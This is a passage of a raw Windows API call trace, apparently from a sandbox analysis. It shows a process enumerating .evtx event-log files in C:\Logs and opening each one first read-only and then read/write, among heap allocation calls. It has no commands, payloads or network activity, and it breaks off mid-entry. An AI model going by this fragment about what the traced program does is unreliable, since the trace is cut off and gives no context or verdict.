(HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.402] AreFileApisANSI () returned 1 [0086.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0086.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=64 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx") returned 64 [0086.402] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0086.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.403] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693a0 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0086.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0086.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0086.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.404] AreFileApisANSI () returned 1 [0086.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0086.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.404] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.404] AreFileApisANSI () returned 1 [0086.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.404] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 58 [0086.404] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.404] GetFileType (hFile=0x348) returned 0x1 [0086.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.404] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.405] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.405] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.405] CloseHandle (hObject=0x348) returned 1 [0086.405] AreFileApisANSI () returned 1 [0086.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a9b0 [0086.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 58 [0086.405] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.405] GetFileType (hFile=0x348) returned 0x1 [0086.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.405] CloseHandle (hObject=0x348) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.406] AreFileApisANSI () returned 1 [0086.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a630 [0086.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx") returned 58 [0086.406] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0086.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.407] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.407] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x463c8 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x2e430 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0086.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x4ebc8 [0086.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0086.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0086.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0086.408] AreFileApisANSI () returned 1 [0086.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpUsedDefaultChar=0x0) returned 73 [0086.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0086.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.408] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0086.408] AreFileApisANSI () returned 1 [0086.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0086.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85760 [0086.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85760, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 73 [0086.408] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.408] GetFileType (hFile=0x348) returned 0x1 [0086.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85760 | out: hHeap=0x20000) returned 1 [0086.409] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.409] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.409] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.409] CloseHandle (hObject=0x348) returned 1 [0086.409] AreFileApisANSI () returned 1 [0086.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0086.409] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0086.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx") returned 73 [0086.409] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-backgroundtaskinfrastructure%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.409] GetFileType (hFile=0x348) returned 0x1 [0086.409] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0086.410] CloseHandle (hObject=0x348) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8abb8 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0086.410] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0086.410] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 